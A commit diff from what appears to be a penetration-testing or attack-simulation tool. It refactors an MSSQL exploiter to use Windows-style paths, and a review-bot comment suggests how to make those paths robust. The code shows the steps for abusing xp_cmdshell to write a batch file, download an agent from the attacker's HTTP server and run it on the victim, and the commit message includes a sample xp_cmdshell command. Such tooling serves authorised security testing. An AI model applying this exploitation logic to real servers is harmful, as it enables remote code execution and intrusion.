Agent: Use PureWindowsPath in MSSQLExploiter
When using PurePath, an agent running on Linux builds Windows paths with its native separator ("/"). Windows tolerates this, so there is no functional issue, but it is sloppy. Using PureWindowsPath objects builds the paths with the correct separator regardless of the agent's host OS. Before: `xp_cmdshell "NUL>%temp%\tmp_monkey_dir/tmp_monkey.bat"` After: `xp_cmdshell "NUL>%temp%\tmp_monkey_dir\tmp_monkey.bat"`
parent
ef63f2699b
commit
ea980c4594
@ -1,6 +1,5 @@
|
|||
import logging
|
||||
import os
|
||||
from pathlib import PurePath
|
||||
from pathlib import PureWindowsPath
|
||||
from time import sleep
|
||||
|
||||
import pymssql
|
||||
|
@ -31,7 +30,7 @@ class MSSQLExploiter(HostExploiter):
|
|||
|
||||
# Temporary file that saves commands for monkey's download and execution.
|
||||
TMP_FILE_NAME = "tmp_monkey.bat"
|
||||
TMP_DIR_PATH = "%temp%\\tmp_monkey_dir"
|
||||
TMP_DIR_PATH = PureWindowsPath("%temp%") / "tmp_monkey_dir"
|
||||
|
||||
MAX_XP_CMDSHELL_COMMAND_SIZE = 12800
|
||||
|
||||
|
@ -49,9 +48,7 @@ class MSSQLExploiter(HostExploiter):
|
|||
super().__init__()
|
||||
self.cursor = None
|
||||
self.agent_http_path = None
|
||||
self.payload_file_path = os.path.join(
|
||||
MSSQLExploiter.TMP_DIR_PATH, MSSQLExploiter.TMP_FILE_NAME
|
||||
)
|
||||
self.payload_file_path = MSSQLExploiter.TMP_DIR_PATH / MSSQLExploiter.TMP_FILE_NAME
|
||||
|
||||
def _exploit_host(self) -> ExploiterResultData:
|
||||
"""
|
||||
|
@ -109,7 +106,7 @@ class MSSQLExploiter(HostExploiter):
|
|||
return self.exploit_result
|
||||
|
||||
def run_payload_file(self):
|
||||
file_running_command = MSSQLLimitedSizePayload(self.payload_file_path)
|
||||
file_running_command = MSSQLLimitedSizePayload(str(self.payload_file_path))
|
||||
return self.run_mssql_command(file_running_command)
|
||||
|
||||
def create_temp_dir(self):
|
||||
|
@ -133,7 +130,7 @@ class MSSQLExploiter(HostExploiter):
|
|||
raise Exception("Couldn't execute MSSQL exploiter because payload was too long")
|
||||
self.run_mssql_commands(array_of_commands)
|
||||
|
||||
def run_monkey(self, monkey_path_on_victim: PurePath):
|
||||
def run_monkey(self, monkey_path_on_victim: PureWindowsPath):
|
||||
monkey_launch_command = self.get_monkey_launch_command(monkey_path_on_victim)
|
||||
logger.debug(
|
||||
f"Launching the agent: {monkey_launch_command.prefix} -- "
|
||||
|
@ -148,7 +145,7 @@ class MSSQLExploiter(HostExploiter):
|
|||
self.cursor.execute(cmd)
|
||||
sleep(MSSQLExploiter.QUERY_BUFFER)
|
||||
|
||||
def upload_monkey(self, monkey_path_on_victim: PurePath):
|
||||
def upload_monkey(self, monkey_path_on_victim: PureWindowsPath):
|
||||
monkey_download_command = self.write_download_command_to_payload(monkey_path_on_victim)
|
||||
self.run_payload_file()
|
||||
self.add_executed_cmd(monkey_download_command.command)
|
||||
|
@ -164,7 +161,7 @@ class MSSQLExploiter(HostExploiter):
|
|||
)
|
||||
self.run_mssql_command(tmp_dir_removal_command)
|
||||
|
||||
def start_monkey_server(self, monkey_path_on_victim: PurePath) -> LockedHTTPServer:
|
||||
def start_monkey_server(self, monkey_path_on_victim: PureWindowsPath) -> LockedHTTPServer:
|
||||
self.agent_http_path, http_thread = HTTPTools.create_locked_transfer(
|
||||
self.host, str(monkey_path_on_victim), self.agent_repository
|
||||
)
|
||||
|
@ -175,12 +172,12 @@ class MSSQLExploiter(HostExploiter):
|
|||
http_thread.stop()
|
||||
http_thread.join(LONG_REQUEST_TIMEOUT)
|
||||
|
||||
def write_download_command_to_payload(self, monkey_path_on_victim: PurePath):
|
||||
def write_download_command_to_payload(self, monkey_path_on_victim: PureWindowsPath):
|
||||
monkey_download_command = self.get_monkey_download_command(monkey_path_on_victim)
|
||||
self.run_mssql_command(monkey_download_command)
|
||||
return monkey_download_command
|
||||
|
||||
def get_monkey_launch_command(self, monkey_path_on_victim: PurePath):
|
||||
def get_monkey_launch_command(self, monkey_path_on_victim: PureWindowsPath):
|
||||
# Form monkey's launch command
|
||||
monkey_args = build_monkey_commandline(
|
||||
self.host, self.current_depth - 1, monkey_path_on_victim
|
||||
|
@ -193,7 +190,7 @@ class MSSQLExploiter(HostExploiter):
|
|||
suffix=suffix,
|
||||
)
|
||||
|
||||
def get_monkey_download_command(self, monkey_path_on_victim: PurePath):
|
||||
def get_monkey_download_command(self, monkey_path_on_victim: PureWindowsPath):
|
||||
monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format(
|
||||
http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim)
|
||||
)
|
||||
|
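Review bot: The new `PureWindowsPath` annotations on `run_monkey`, `upload_monkey`, `start_monkey_server`, `write_download_command_to_payload` and `get_monkey_download_command` are not enforced, so a plain `PurePath` built by a caller outside this diff (the path appears to originate in `_exploit_host`, which is cut by the hunk) would still yield a forward-slash string from `str(monkey_path_on_victim)` and land unchanged in the xp_cmdshell command built by `MONKEY_DOWNLOAD_COMMAND.format(...)`. Coercing at the point of use makes the fix independent of every caller: `http_path=self.agent_http_path, dst_path=str(PureWindowsPath(monkey_path_on_victim))` — `PureWindowsPath` accepts either separator, so even a `PurePosixPath` argument is normalised to backslashes. The same one-line coercion applies in `start_monkey_server`, where `str(monkey_path_on_victim)` is passed to `HTTPTools.create_locked_transfer`. The description's claim that forward slashes are harmless is also worth hedging, since `cmd.exe` built-ins can read a leading `/` as a switch prefix when the path is an argument rather than the command itself. `get_monkey_download_command`'s body continues past the end of the last hunk.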